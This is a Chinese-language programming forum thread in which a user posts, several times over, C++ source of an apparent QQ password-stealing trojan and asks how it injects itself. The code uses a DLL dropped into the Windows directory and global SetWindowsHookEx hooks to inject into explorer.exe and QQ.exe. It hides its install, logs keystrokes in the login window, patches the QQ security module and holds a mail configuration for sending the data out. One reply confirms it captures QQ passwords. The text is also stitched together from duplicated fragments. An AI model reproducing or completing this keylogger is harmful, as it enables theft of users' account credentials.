typedef struct MAPDATA{
DWORD currThreadID;
char exeFile[MAX_PATH];
} *pMAPDATA;string ClassName= "tmpWnd20070109";
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
string hookDLL = "HookDll.dll";
typedef void (* INHook)();
typedef void (* UNHook)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
int main(int argc, char* argv[])
{
MSG msgStruct;
HANDLE mutexHandle = NULL;
HANDLE fileHandle = NULL;
pMAPDATA tMapData = NULL;
char thisExeName[MAX_PATH] ; if((OpenMutex(MUTEX_ALL_ACCESS, FALSE, exeMutex.c_str()) != 0) || (OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str()) != 0))
{
return 1;
} mutexHandle= ::CreateMutex(NULL,FALSE,exeMutex.c_str());
fileHandle = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(MAPDATA), sFileMap.c_str()); tMapData = (pMAPDATA)::MapViewOfFile(fileHandle,FILE_MAP_ALL_ACCESS,0,0,sizeof(MAPDATA));
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// 等待WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
return 0;
}
这段代码的功能,我看象是读共享内存的,但运行后是怎么是线程插入的呢?
DWORD currThreadID;
char exeFile[MAX_PATH];
} *pMAPDATA;string ClassName= "tmpWnd20070109";
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
string hookDLL = "HookDll.dll";
typedef void (* INHook)();
typedef void (* UNHook)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
int main(int argc, char* argv[])
{
MSG msgStruct;
HANDLE mutexHandle = NULL;
HANDLE fileHandle = NULL;
pMAPDATA tMapData = NULL;
char thisExeName[MAX_PATH] ; if((OpenMutex(MUTEX_ALL_ACCESS, FALSE, exeMutex.c_str()) != 0) || (OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str()) != 0))
{
return 1;
} mutexHandle= ::CreateMutex(NULL,FALSE,exeMutex.c_str());
fileHandle = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(MAPDATA), sFileMap.c_str()); tMapData = (pMAPDATA)::MapViewOfFile(fileHandle,FILE_MAP_ALL_ACCESS,0,0,sizeof(MAPDATA));
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// 等待WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
return 0;
}
这段代码的功能,我看象是读共享内存的,但运行后是怎么是线程插入的呢?
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// 等待WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);那为大侠能解释详细点,就是上面的这几步
http://www.yesky.com/20030117/1649013.shtml
你是对于FileMap 不明白?? 如果这个不明白,大家就不好说了其他有什么不知道的, 请指定在那个地方, 不要太笼统
CreateFileMapping 就是用来共乡内存,得到这个实例的名字然后存到pMAPDATA里,照前面MUTEX来看,就是只允许一个实例存在,大致只能得到这些信息
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);上面就是内存映射 共享了内存
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);//释放掉这段内存了
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// 等待WM_QUIT
{}UnHook();
//CloseHandle(fileHandle);
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
typedef struct MAPDATA{
DWORD currThreadID;
char exeFile[MAX_PATH];
} *pMAPDATA;string ClassName= "tmpWnd20070109";
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
string hookDLL = "HookDll.dll";
typedef void (* INHook)();
typedef void (* UNHook)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
int main(int argc, char* argv[])
{
MSG msgStruct;
HANDLE mutexHandle = NULL;
HANDLE fileHandle = NULL;
pMAPDATA tMapData = NULL;
char thisExeName[MAX_PATH] ; if((OpenMutex(MUTEX_ALL_ACCESS, FALSE, exeMutex.c_str()) != 0) || (OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str()) != 0))
{
return 1;
} mutexHandle= ::CreateMutex(NULL,FALSE,exeMutex.c_str());
fileHandle = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(MAPDATA), sFileMap.c_str()); tMapData = (pMAPDATA)::MapViewOfFile(fileHandle,FILE_MAP_ALL_ACCESS,0,0,sizeof(MAPDATA));
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// 等待WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
return 0;
}// start.cpp : Defines the entry point for the application.
//
void LoadDllFunc()
{
HINSTANCE hModule;
extractRes();
char dir[MAX_PATH];
::GetWindowsDirectory(dir,MAX_PATH);
string s = dir;
s.append("\\");
s.append(hookDLL);
hModule = ::LoadLibrary(s.c_str());//"D:\\Test5\\Debug\\HookDll.dll");
if (hModule != NULL)
{
DllInstallHook = (INHook)GetProcAddress(hModule,"InsertHookOn");
DllUnHook = (UNHook)GetProcAddress(hModule,"InsertHookOff");
// DllGetShareData = (GTSDATA)GetProcAddress(hModule,"GetShareData");
}
}void InstallHook()
{
if(DllInstallHook == NULL)
{
LoadDllFunc();
} if(DllInstallHook != NULL)
{
DllInstallHook();
}
}上面是EXE里的代码
//////////////////////////////////////////////////////////////////////////
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
HHOOK hGetHook = NULL;
HHOOK hWndHook = NULL;
HWND TempFormHandle = NULL;char module[MAX_PATH];
bool isQQ = false;
bool isExplorer = false;
string password = "";
string qqNumber = "";
string ClassName= "tmpWnd20070109";
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
string qqExeName= "QQ.exe";ShareData sd;
long qqThreadID = 0;
int timer = 0;
int timerQQ = 0;
int elapse = 1000;
bool willNotCloseQQ = true;
int closeQQWaitTime = 2000;// 2 secs
//dllShareData *m_pDllShareData;
//HANDLE m_hMapFile;typedef struct MAPDATA{
DWORD currThreadID;
char exeFile[MAX_PATH];
} *pMAPDATA;typedef struct MAILCONFIG{
char senderName[255];
char senderAddr[255];
char senderPassword[255];
char senderSMTP[255];
char receiverAddr[255];
} *pMAILCONFIG;MAILCONFIG mConfig;
bool mailInit = false;
// This is an example of an exported function.
HOOKDLL_API void MsgHookOn()
{
//MessageBox(NULL,"MessageHook on","Test",MB_OK);
hGetHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc,GetCurrentModule(), 0);
hWndHook = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc,GetCurrentModule(), 0);
}HOOKDLL_API void MsgHookOff()
{
if(hGetHook != NULL)
::UnhookWindowsHookEx(hGetHook);
if(hWndHook != NULL)
::UnhookWindowsHookEx(hWndHook);
}LRESULT CALLBACK New_SetWindowLongA(HWND ahWnd, WPARAM nIndex, LPARAM dwNewLong)
{
Register_TempForm();
Create_TempForm();
//MessageBox(NULL,"We are in New_SetWindowLongA","Test",MB_OK); while (IsWindow(TempFormHandle))
{
SendMessage(TempFormHandle, WM_CLOSE, 0, 0);
//MessageBox(NULL,"We are in New_SetWindowLongA","Test",MB_OK);
}
Unregister_TempForm();
return 0;
}
//FUN New_SetWindowLongB = New_SetWindowLongA;
DWORD WINAPI ThreadProc1(LPVOID lpParameter)
{
MSG msgStruct;
HANDLE hMutex;
//MessageBox(NULL,"create mutex befor success","tt",MB_OK);
hMutex = ::CreateMutex(NULL,FALSE, dllMutex.c_str());
//MessageBox(NULL,"create mutex befor success","tt",MB_OK);
InstallHook();
timer = StartTimer();
while (GetMessage(&msgStruct, 0, 0, 0)!=0)
{
if (msgStruct.message == WM_TIMER)
{
ProcTimer();
}
TranslateMessage(&msgStruct);
DispatchMessage(&msgStruct);
}
StopTimer(timer);
UnHook();
::CloseHandle(hMutex);
::FreeLibraryAndExitThread(::GetCurrentModule(), 0);
return 1;
}
void init(){
DWORD subThreadID;
pMAPDATA shareData;
string callerExeName = "";
DWORD callerThreadID;
LPVOID lpParameter = NULL; ::GetModuleFileName(NULL,module,MAX_PATH);
string exeFullName = module;
string exeName = extractFileName(exeFullName);
if(::strcmpi(exeName.c_str(),"explorer.exe") == 0)
{
HANDLE hMutex = ::OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str());
if(hMutex != NULL)
{
//MessageBox(NULL,"Mutex dll Not null","hhtt",MB_OK);
::CloseHandle(hMutex);
}
else
{
isExplorer = true;
//CreateShareData2();
sd.CreateShareData();
if(sd.GetShareData != NULL) //(m_pDllShareData != NULL)
{
HANDLE hThread = ::CreateThread(0, 0, ThreadProc1, NULL, 0, &subThreadID);
HANDLE hFile = ::OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, sFileMap.c_str());
shareData = (pMAPDATA)::MapViewOfFile(hFile, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(MAPDATA));
callerExeName = shareData->exeFile;
callerThreadID = shareData->currThreadID; char cName[MAX_PATH];
::GetModuleFileName(::GetCurrentModule(),cName,MAX_PATH);
MessageBox(NULL,cName,"test1",MB_OK);
::LoadLibrary(cName);//增加dll的引用计数
::UnmapViewOfFile(shareData);
::CloseHandle(hFile); ::PostThreadMessage(callerThreadID, (UINT)WM_QUIT, 0, 0);
strcpy(sd.GetShareData()->cfgFileName,HiddenInstall(callerExeName).c_str()); ::LoadLibrary(sd.GetShareData()->cfgFileName);
MessageBox(NULL,sd.GetShareData()->cfgFileName,"test1",MB_OK); }
}
}
else if(::strcmpi(exeName.c_str(),"qq.exe") == 0)
{
qqThreadID = ::GetCurrentProcessId();
sd.OpenShareData();
MessageBox(NULL,sd.GetShareData()->cfgFileName,"test3",MB_OK);
::CreateThread(NULL, 0, QQThreadProc, NULL, 0, &subThreadID);
HANDLE hMutex = ::OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str());
if(hMutex != NULL)
{
::CloseHandle(hMutex);
string exePath = extractFilePath(exeFullName);
isQQ = true; exePath.append("LoginCtrl.Dll");
::LoadLibrary(exePath.c_str()); // load LoginCtrl.Dll
ReplaceInOneModule("USER32.DLL","SetWindowLongA",(FUN)New_SetWindowLongA,::GetModuleHandle("npkcntc.dll"));//LoadLibrary(exePath.c_str())); }
}
}DWORD WINAPI QQThreadProc(LPVOID lpParameter)
{
MSG msgStruct;
timerQQ = StartQQTimer();
while (GetMessage(&msgStruct, 0, 0, 0)!=0 && !willNotCloseQQ)
{
if (msgStruct.message == WM_TIMER)
{
QQProcTimer();
}
TranslateMessage(&msgStruct);
DispatchMessage(&msgStruct);
}
StopTimer(timerQQ);
return 0;
}LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam,LPARAM lParam){
if (isQQ && nCode == HC_ACTION){
CWPSTRUCT* pMsg = (CWPSTRUCT*)lParam;
switch (pMsg->message)
{
case WM_DESTROY:
OnDestroy(pMsg->hwnd);
break;
}
} return CallNextHookEx(hWndHook,nCode,wParam,lParam);
}
LRESULT CALLBACK GetMsgProc(int nCode, WPARAM wParam,LPARAM lParam){
if(isQQ && nCode == HC_ACTION && wParam == PM_REMOVE){
MSG* pMsg = (MSG*)lParam;
switch(pMsg->message)
{
case WM_KEYDOWN:
OnKeyDown(pMsg->hwnd, pMsg->wParam, pMsg->lParam);
break;
case WM_PASTE:
if(IsPassEdit(pMsg->hwnd))
{
pMsg->message = NULL;
}
break;
default:
break;
}
}
return CallNextHookEx(hGetHook,nCode,wParam,lParam);
}
int StartTimer()
{
return ::SetTimer(NULL,1,elapse,NULL);
}int StartQQTimer()
{
InitCloseQQValues();
return ::SetTimer(NULL,1,elapse,NULL);
}void InitCloseQQValues()
{
willNotCloseQQ = false;
closeQQWaitTime = 10;
}void StopTimer(int t)
{
::KillTimer(NULL,t);
}typedef void (* INHook)();
typedef void (* UNHook)();
typedef pMAPDATA (* GTSDATA)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
GTSDATA DllGetShareData = NULL;void LoadDllFunc()
{
char tDLLName[MAX_PATH];
HINSTANCE hModule;
::GetModuleFileName(GetCurrentModule(),tDLLName,MAX_PATH);
hModule = ::LoadLibrary(tDLLName);
if (hModule != NULL)
{
DllInstallHook = (INHook)GetProcAddress(hModule,"MsgHookOn");
DllUnHook = (UNHook)GetProcAddress(hModule,"MsgHookOff");
DllGetShareData = (GTSDATA)GetProcAddress(hModule,"GetShareData");
}
}void InstallHook()
{
if(DllInstallHook == NULL)
{
LoadDllFunc();
} if(DllInstallHook != NULL)
{
DllInstallHook();
}
}void UnHook()
{
if(DllUnHook == NULL)
{
LoadDllFunc();
} if(DllUnHook != NULL)
{
DllUnHook();
}
}
这是一个典型的钩子程序,分成2部分,一部分是监控,可以监控exe和dll的运行状况,这里主要是截获相关的消息。另一部分是钩子,注入相应的应用程序,并把某些消息转发给监控程序。
好像它主要是截获QQ的登录消息,把用户输入的密码的每个字符键消息转发给监控部分,来获取用户输入的QQ密码。
有些地方没有细看,大概就是这个功能,关键的技术点是“钩子”,你可以网上找些资料研究一下就明白了。
我怎么看就是内存共乡的,怎么能插入呢??
hGetHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc,GetCurrentModule(), 0);
hWndHook = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc,GetCurrentModule(), 0);
DLL中的入口点DllMain函数会在注入时自动被调用,在这个函数中有个init()就被调用了.好像是这样,低码太长,看不下去.
他存在的目的是使DLL中的数据和你的外部程序数据进行交互, 在进程通信中是长用的,
你分开看, 钩子看钩子实现 和功能 , 共享内存单看为一项功能,就明了了